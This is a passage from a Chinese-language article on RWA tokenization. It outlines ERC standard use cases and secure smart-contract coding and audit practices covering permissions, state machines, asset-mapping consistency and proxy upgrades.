RWA：ERC-6065 (Real Estate Token)</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">适用场景：链上房地产信托投资基金(REITs)；支持通过房地产 NFT 作为抵押品进行稳定币借贷去中心化抵押借贷协议；以及跨境房产交易平台。</span></span></p><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">2、物联网与实物资产：ERC-4519</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">适用合约场景：去中心化共享租赁平台；高价值物流追踪，智能行李箱或集装箱在运输过程中实时验证持有者身份；以及车联网金融，通过 NFT 控制车辆启动权限来实现分时租赁或贷款违约自动锁车。</span></span></p><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">3、通用合规接口：ERC-7943 (uRWA)</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;margin-bottom: 24px;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">适用合约场景：合规 DeFi 流动性池，确保只有通过 KYC 的地址才能参与借贷；受监管的证券型代币发行(STO) 平台，内置司法冻结和强制执行逻辑以满足 SEC 等监管要求；以及机构级稳定币支付网络，支持反洗钱(AML) 合规检查和可疑资金冻结。</span></span></p></b></p><p><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">四、安全编码实践</span></span><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">无论 RWA 项目</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">采用哪种协议标</span></span><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">准或资产架构，严谨的代码实现始终是合规性与业务创新的物理底座。</span></span></p><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">3.1 权限与角色设计：先把“谁能做什么”规划好</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在多数 RWA 协议中，权限问题往往不是“有没有 admin”，而是“什么样的 admin 可能做到什么程度”。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">常见的角色包括：合约所有者、治理多签、升级管理员、合规管理员、KYC / 白名单管理员、冻结管理员、资产登记 / 注册管理员、赎回管理员、Oracle 管理员、风控参数管理员、财务 / 金库管理员，等等。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">对开发者来说：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">一开始就画一张角色-权限矩阵</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">用清晰的权限框架实现</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">实现职责分离，而不是超级管理员一键全权</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">对审计人员来说，首要工作就是：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">把代码里所有“高危函数”列出来：</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">对照权限矩阵检查：</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">3.2 状态机与不变式：把业务生命周期写死在代码里</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">状态机，简单来说就是，允许对象（token、份额、配置、请求等）处于哪些状态；在什么条件下可以从一个状态转变到另一个状态；在不同状态下允许或禁止哪些操作。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">不变式，则是不论调用顺序如何、经过多少操作，有几条核心约束必须始终成立；一旦被打破，就说明协议设计或实现出了严重问题。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">从开发角度看，一个相对健康的写法应当是：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">先从业务推导状态机，再落到代码 enum / 标志位上</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">每个外部入口都写清楚状态前置条件</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">把关键不变式写在代码逻辑里</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">从审计角度看，状态机与不变式是设计的核心切入点：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">从项目方文档中识别出对应的生命周期和关键不变式，再对照代码逐项验证；</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">对所有状态转换路径做穷举思考，寻找是否存在可以绕过状态机的捷径；</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">尝试寻找突破边界操作（重复调用、交叉调用），验证不变式是否能被破坏。</span></span></p></li></ul><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">3.3 资产映射与账务一致性：别让链上账目和链下资产“对不上数”</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">RWA 的特性是：链上只是映射，真正的资产在链下。因此，RWA 的 “账务一致性”比 DeFi 更关键：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">对开发者来说，要尽量让代码层的资产关系清晰，减少歧义；</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">对审计来说，要能一眼看出某个变量到底在代表什么：某个资产、某种批次、某个金库、某个期限？</span></span></p></li></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">开发时可以遵循几个简单原则：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">区分“记账变量”和“配置/中间量”</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">明确“这一层 token 对应的是哪一层资产”</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">所有资产变动必须有清晰闭环</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">审计时，资产映射问题往往通过两种方式暴露：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">一是“对不上”：</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">二是“分不清”：</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这类问题不一定会立刻变成攻击向量，但长期来看，会极大增加项目出错和被滥用的风险。</span></span></p><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">3.4 升级与代理模式：给自己留后路，也配合好“改规则的人”</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">绝大多数 RWA 项目都会采用代理模式（Transparent / UUPS 等）配合多签或治理进行升级管理。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">开发时需要注意几个基本点：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 